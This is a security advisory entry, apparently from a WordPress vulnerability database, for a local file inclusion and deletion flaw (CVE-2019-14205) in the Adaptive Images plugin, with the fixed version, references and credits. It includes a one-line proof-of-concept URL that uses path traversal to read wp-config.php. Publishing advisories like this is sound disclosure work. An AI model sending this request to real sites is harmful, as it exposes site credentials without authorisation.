Adaptive Images for WordPress <= 0.6.66 – Local File Inclusion & Deletion | CVE 2019-14205

Description

The Adaptive Images for WordPress WordPress plugin was affected by a Local File Inclusion & Deletion security vulnerability.

This vulnerability has been seen exploited in the wild.

Proof of Concept

https://www.example.com/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php

Affects Plugins

adaptive-images

Fixed in 0.6.67

References

CVE

CVE-2019-14205

CVE

CVE-2019-14206

URL

https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown

URL

https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html

URL

https://plugins.trac.wordpress.org/changeset/2121762/adaptive-images

Miscellaneous

Original Researcher

Mark Gruffer

Submitter

Ryan Dewhurst

Submitter website

https://wpscan.io

Submitter twitter

ethicalhack3r

Verified

WPVDB ID

025a47f0-eddc-46dd-b994-e1e824dc5225

Timeline

Publicly Published

2019-07-19 (about 6 years ago)

Added

2019-07-22 (about 6 years ago)

Last Updated

2021-04-04 (about 4 years ago)

Other

Published

Title

Published

2020-01-17

Title

Marketo Forms and Tracking <= 1.0.2 - CSRF to XSS

Published

2014-08-01

Title

Cimy Counter - Vulnerabilities

Published

2014-08-01

Title

Mingle Forum <= 1.0.32.1 - Cross Site Scripting / SQL Injection

Published

2014-09-17

Title

Ready! Ecommerce 0.5.0 - CSRF & XSS

Published

2014-12-17

Title

Bird Feeder <= 1.2.3 - CSRF & XSS